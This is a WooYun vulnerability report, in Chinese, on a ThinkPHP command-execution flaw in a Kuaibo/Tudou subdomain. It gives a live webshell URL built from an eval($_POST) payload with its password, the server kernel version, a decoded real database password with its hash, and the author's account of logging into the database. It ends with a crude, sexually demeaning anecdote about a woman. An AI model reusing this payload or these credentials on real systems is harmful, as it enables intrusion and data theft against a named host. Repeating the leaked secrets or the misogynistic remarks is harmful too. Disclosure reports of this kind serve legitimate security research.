WooYun.org

其实就是thinkphp命令执行导致的。
shell地址
http://kuaibo.union.tudou.com/?s=/a/a/a/{${eval($_POST[a])}}
密码是:a
上菜刀

好多快播的分站啊。
我把nginx配置文件下载回来看了下：

大都是快播的分站，不过好多分站都是 限制IP的。
类似这样的

内核版本有点低
Linux ZQ220_156 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64
我就懒得提权了。
反正数据库都能看。
主要本吊想快点刷点乌币换苹果呢。也就没深入。
我看到他数据库密码很有意思呢。

这种不是掩耳盗铃吗？
我直接复制出来echo就打印出密码了，没有起到加密的作用哦。
我解密后是这个
kbtudou
8e772fbae02eb5df23d20c4840cc2d4c
然后连接一下看看：

连上了 我也就不脱裤了，它又不是女神。
里面数据库有很多呢 举个例子：

今天我跟女神聊天了。
回来寝室，立马打开我的台式电脑，想着心爱的女神一定要在线啊。不过，大快人心的是果然是灰蒙蒙的头像，我知道女神肯定是对我在线隐身了。不过我这样的吊丝也是有自知者明的，心里想着，能给你送这么高贵的爱疯5的人在学校也不可能超过三个。你就乖乖投降吧。
　　然后我就给女神留言了，说我在乌云的rank快可以换爱疯5了，自己不爱怎么喜欢苹果，所以送给她。本吊还是很有自尊心的，想这样说比较有面子，其实何尝不想尝试下爱疯呢。碉堡了的是，女神马上头像就闪动起来了。
　　“嗯，谢谢啦，我刚回来开电脑就看到你留言了”
　　
　　看到女神自己照片做的头像亮了起来，心里想，当我白痴，当时真想狠狠撸她一管，以解心头之恨，简直是欺负吊丝智商，毕竟吊丝一直混乌云的，这些小伎俩前辈们都中招给我们提示了。哼！
　　
　　正在意淫怎么和女神啪啪啪呢，女神就发来消息说，去洗澡。
　　我连忙说。晚安~早点睡，好梦。
　　字还没打完，头像又黑了。
　　
　　哎，想想也就算了，毕竟能和女神说一次这么久的QQ，也不容易了。
还是快点多日点站吧。